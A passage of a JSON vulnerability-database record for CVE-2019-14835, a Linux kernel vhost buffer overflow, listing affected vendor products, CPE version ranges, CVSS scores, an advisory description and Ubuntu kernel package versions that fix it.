        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "6.5.rc2.b050"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.3"
      },
      {
        "model": "h610s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.74"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.1"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "imanager neteco 6000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "v600r008c10spc300"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "imanager neteco",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "v600r009c00"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.04"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14"
      },
      {
        "model": "data availability services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19"
      },
      {
        "model": "virtualization host",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "service processor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "manageone",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "6.5.1rc1.b080"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.193"
      },
      {
        "model": "imanager neteco 6000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "v600r008c20"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "manageone",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "6.5.0.spc100.b210"
      },
      {
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "manageone",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "6.5.0"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.2.15"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.34"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.73"
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "virtualization",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "29"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.2.15",
                "versionStartIncluding": "5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.73",
                "versionStartIncluding": "4.19",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.16.74",
                "versionStartIncluding": "2.6.34",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.144",
                "versionStartIncluding": "4.14",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.193",
                "versionStartIncluding": "4.4",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.193",
                "versionStartIncluding": "4.9",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:aff_a700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:aff_a700s:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h610s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h610s:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300s:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500s:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700s:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300e:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500e:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700e:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410s:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:service_processor:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:data_availability_services:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:_steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time:7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:redhat:virtualization:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:huawei:manageone:6.5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:huawei:imanager_neteco_6000:v600r008c10spc300:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:huawei:imanager_neteco_6000:v600r008c20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:huawei:imanager_neteco:v600r009c00:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:huawei:imanager_neteco:v600r009c10spc200:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:huawei:manageone:6.5.0.spc100.b210:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:huawei:manageone:6.5.1rc1.b060:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:huawei:manageone:6.5.1rc1.b080:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:huawei:manageone:6.5.rc2.b050:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154602"
      },
      {
        "db": "PACKETSTORM",
        "id": "154562"
      },
      {
        "db": "PACKETSTORM",
        "id": "154659"
      },
      {
        "db": "PACKETSTORM",
        "id": "154570"
      },
      {
        "db": "PACKETSTORM",
        "id": "154540"
      }
    ],
    "trust": 0.5
  },
  "cve": "CVE-2019-14835",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "VHN-146821",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "secalert@redhat.com",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 0.6,
            "impactScore": 6.0,
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-14835",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "secalert@redhat.com",
            "id": "CVE-2019-14835",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-146821",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146821"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A buffer overflow flaw was found, in versions from 2.6.34 to 5.2.x, in the way Linux kernel\u0027s vhost functionality that translates virtqueue buffers to IOVs, logged the buffer descriptors during migration. A privileged guest user able to pass descriptors with invalid length to the host when migration is underway, could use this flaw to increase their privileges on the host. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. 6.5) - x86_64\n\n3. \n(CVE-2019-14835)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. (CVE-2019-15031)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 19.04:\n  linux-image-5.0.0-1016-aws      5.0.0-1016.18\n  linux-image-5.0.0-1017-gcp      5.0.0-1017.17\n  linux-image-5.0.0-1017-kvm      5.0.0-1017.18\n  linux-image-5.0.0-1017-raspi2   5.0.0-1017.17\n  linux-image-5.0.0-1020-azure    5.0.0-1020.21\n  linux-image-5.0.0-1021-snapdragon  5.0.0-1021.22\n  linux-image-5.0.0-29-generic    5.0.0-29.31\n  linux-image-5.0.0-29-generic-lpae  5.0.0-29.31\n  linux-image-5.0.0-29-lowlatency  5.0.0-29.31\n  linux-image-aws                 5.0.0.1016.17\n  linux-image-azure               5.0.0.1020.19\n  linux-image-gcp                 5.0.0.1017.43\n  linux-image-generic             5.0.0.29.30\n  linux-image-generic-lpae        5.0.0.29.30\n  linux-image-gke                 5.0.0.1017.43\n  linux-image-kvm                 5.0.0.1017.17\n  linux-image-lowlatency          5.0.0.29.30\n  linux-image-raspi2              5.0.0.1017.14\n  linux-image-snapdragon          5.0.0.1021.14\n  linux-image-virtual             5.0.0.29.30\n\nUbuntu 18.04 LTS:\n  linux-image-4.15.0-1025-oracle  4.15.0-1025.28\n  linux-image-4.15.0-1044-gcp     4.15.0-1044.70\n  linux-image-4.15.0-1044-gke     4.15.0-1044.46\n  linux-image-4.15.0-1046-kvm     4.15.0-1046.46\n  linux-image-4.15.0-1047-raspi2  4.15.0-1047.51\n  linux-image-4.15.0-1050-aws     4.15.0-1050.52\n  linux-image-4.15.0-1056-oem     